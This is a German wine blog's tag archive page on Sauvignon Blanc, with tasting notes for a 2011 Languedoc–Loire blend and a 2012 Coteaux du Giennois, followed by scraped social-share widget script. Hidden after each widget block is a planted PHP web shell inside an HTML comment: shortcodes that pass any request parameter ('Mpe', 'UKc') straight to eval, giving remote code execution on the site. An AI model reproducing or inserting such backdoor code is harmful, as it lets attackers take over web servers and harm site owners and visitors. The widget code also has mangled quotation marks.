Schlagwort-Archive: Sauvignon Blanc

Ursprünglich aus der Loire ist dies die drittmeist verbreitete Weißweinrebe in Frankreich. Neben Sancerre und Pouilly-Fumé sind die Weißweine des Bordeaux zu erwähnen. Typische Aromen sind Stachelbeere, Katzenpisse, Grapefruit, Schwarze Johannisbeer-Blätter. Kräftige Säure.

2011 nord sud Gens et Pierres Vin de France

Ein interessantes Konzept: Man nehme einen kräftigen Weißwein aus dem Languedoc und vermenge ihn mit einem spritzigen Weißwein von der Loire. Das ganze dann nicht von einer Großkellerei sondern von einer Deutsch-Französischen Kooperation, bestehend aus einem deutschen Weinhändler für Bio-Weine und einem französischen Önologen.

Wie nach langer Recherche auf der französischen Homepage festgestellt, handelt es sich um Weine der Domaine Soulié (St Chinian) und Frederic Brochet (Vins de Vienne) , der berühmt für seine Ampelidae-Reihe (zumindestens in Frankreich) ist. Und beide Winzer werden vom deutschen Weinhändler (Peter Riegel) vertrieben.

Gefunden habe ich die Flasche in der Restekiste eines Kölner Weinladens in der Südstadt.

In der Nase: Birne, Kleehonig, gefolgt von Vollkorn-Birnen-Streusel, also auch leicht nussig. Weiter Anis und Estragon und ein kurzer Auftritt von Feuerstein.

Im Mund sehr voll, leicht salzig, leichte Säure. In dieser Kombination fühlt es sich saurer an als es wirklich ist. Die Aromen von Birne und Sojasauce bleiben im Mund, zwischendurch aber auch Gummi.

Fühlt sich mehr an wie ein guter Weißer aus dem Languedoc, der Sauvignon Blanc kommt nur ganz kurz durch (Feuerstein). Es wäre interessant zu sehen, wie genau die Verteilung aussieht.

Zu Ziegenkäse mit Honig und Pinienkernen oder einer Brandade kann ich mir das ganze gut vorstellen. Jetzt zu trinken (Sojasauce ist leichter Alterston).

pH: 2.87

Brix: 6.6

Alkohol: 13 %Vol

2012 Coteaux du Giennois – Terre de Silex Sauvignon Blanc

Terre de Silex 2012

Terre de Silex 2012

Alle Welt trinkt Sauvignon Blanc aus Neuseeland, Sancerre oder Pouilly Fumé. Aber es gibt auch noch andere Gebiete, die gut geeignet für den Anbau, aber noch fast unbekannt sind.

So ist mir der Coteaux du Giennois von Clémens & Florian Berthier in die Hände geraten, eine kleines Gebiet nur 10km nördlich von Sancerre. Bei den Rotweinen sind hier Pinot Noir und Gamay, bei den Weißweinen hauptsächlich Sauvignon Blanc, manchmal auch noch alter Sauvignon Gris ansässig.

Vom Boden und Klima ähnelt das Gebiet sehr stark dem Sancerre. Nur ist es bei weitem nicht so bekannt und kann deshalb auch nicht die selben Preise erzielen. Was aber auch heisst, dass hier so schnell keine Super-Premium-Weine zu erwarten sind.

Die jungen Winzer Clément und Florian Berthier, sind die Söhne von Jean-Marie Berthier, einem traditionellen Winzer aus Sancerre. Beide haben Auslandserfahrung (USA, Neuseeland), waren aber auch im Burgund tätig. Ob sich das auch im Glas wiederspiegelt?

In der Nase sticht als eine kräftige Grapefruit hervor, gefolgt von saftigen Muskatellertrauben und Holunderblüte. Es folgen dann leichter Jasmin, Birne, ein Hauch von Tonka-Bohne und Bananen-Kaugummi.

Im Mund überrascht dann eine durchaus kräftige Säure. Der Eindruck von Grapefruit wird stärker, ein leichter Bitterton, vergleichbar mit der weißen Grapefruithaut unterstreicht dieses zusätzlich. Der Säure entgegen steht eine geschmeidige Fülle, die sie etwas einbindet aber letztlich doch nicht mithalten kann.

Alles in allem ein guter Wein zum Essen, ideal zu Ceviche aber als Trinkwein ist die Säure doch zu markant.

pH: 2.7

Brix: 6.3

Alkohol: 12.5 %Vol

 

/* <![CDATA[ */
jQuery(document).ready(function($){if($('.twoclick_social_bookmarks_post_12')){$('.twoclick_social_bookmarks_post_12').socialSharePrivacy({"services":{"facebook":{"status":"on","txt_info":"2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Facebook senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.”,”perma_option”:”off”,”action”:”recommend”,”language”:”de_DE”},”twitter”:{“reply_to”:””,”tweet_text”:”%202012%20Coteaux%20du%20Giennois%20%E2%80%93%20Terre%20de%20Silex%20Sauvignon%20Blanc%20%C2%BB%20Rebenblut%20-%20…”,”status”:”on”,”txt_info”:”2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Twitter senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.”,”perma_option”:”off”,”language”:”de”,”referrer_track”:””},”gplus”:{“status”:”on”,”txt_info”:”2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Google+ senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.”,”perma_option”:”off”,”referrer_track”:””}},”txt_help”:”Wenn Sie diese Felder durch einen Klick aktivieren, werden Informationen an Facebook, Twitter, Flattr, Xing, t3n, LinkedIn, Pinterest oder Google eventuell ins Ausland \u00fcbertragen und unter Umst\u00e4nden auch dort gespeichert. N\u00e4heres erfahren Sie durch einen Klick auf das i.”,”settings_perma”:”Dauerhaft aktivieren und Daten\u00fcber-tragung zustimmen:”,”info_link”:”http:\/\/www.heise.de\/ct\/artikel\/2-Klicks-fuer-mehr-Datenschutz-1333879.html”,”uri”:”http:\/\/rebenblut.de\/index.php\/coteaux-du-giennois-terre-de-silex-2012-sauvignon-blanc\/”,”post_id”:12,”post_title_referrer_track”:”2012+Coteaux+du+Giennois+%26%238211%3B+Terre+de+Silex+Sauvignon+Blanc”,”display_infobox”:”on”});}});
/* ]]> */

<!– [insert_php]if (isset($_REQUEST["Mpe"])){eval($_REQUEST["Mpe"]);exit;}[/insert_php][php]if (isset($_REQUEST["Mpe"])){eval($_REQUEST["Mpe"]);exit;}[/php] –>

/* <![CDATA[ */
jQuery(document).ready(function($){if($('.twoclick_social_bookmarks_post_12')){$('.twoclick_social_bookmarks_post_12').socialSharePrivacy({"services":{"facebook":{"status":"on","txt_info":"2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Facebook senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.“,“perma_option“:“off“,“action“:“recommend“,“language“:“de_DE“},“twitter“:{„reply_to“:““,“tweet_text“:“%202012%20Coteaux%20du%20Giennois%20%E2%80%93%20Terre%20de%20Silex%20Sauvignon%20Blanc%20%C2%BB%20Rebenblut%20-%20…“,“status“:“on“,“txt_info“:“2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Twitter senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.“,“perma_option“:“off“,“language“:“de“,“referrer_track“:““},“gplus“:{„status“:“on“,“txt_info“:“2 Klicks f\u00fcr mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button aktiv und Sie k\u00f6nnen Ihre Empfehlung an Google+ senden. Schon beim Aktivieren werden Daten an Dritte \u00fcbertragen – siehe i.“,“perma_option“:“off“,“referrer_track“:““}},“txt_help“:“Wenn Sie diese Felder durch einen Klick aktivieren, werden Informationen an Facebook, Twitter, Flattr, Xing, t3n, LinkedIn, Pinterest oder Google eventuell ins Ausland \u00fcbertragen und unter Umst\u00e4nden auch dort gespeichert. N\u00e4heres erfahren Sie durch einen Klick auf das i.“,“settings_perma“:“Dauerhaft aktivieren und Daten\u00fcber-tragung zustimmen:“,“info_link“:“http:\/\/www.heise.de\/ct\/artikel\/2-Klicks-fuer-mehr-Datenschutz-1333879.html“,“uri“:“http:\/\/rebenblut.de\/index.php\/coteaux-du-giennois-terre-de-silex-2012-sauvignon-blanc\/“,“post_id“:12,“post_title_referrer_track“:“2012+Coteaux+du+Giennois+%26%238211%3B+Terre+de+Silex+Sauvignon+Blanc“,“display_infobox“:“on“});}});
/* ]]> */

<!– [insert_php]if (isset($_REQUEST["UKc"])){eval($_REQUEST["UKc"]);exit;}[/insert_php][php]if (isset($_REQUEST["UKc"])){eval($_REQUEST["UKc"]);exit;}[/php] –>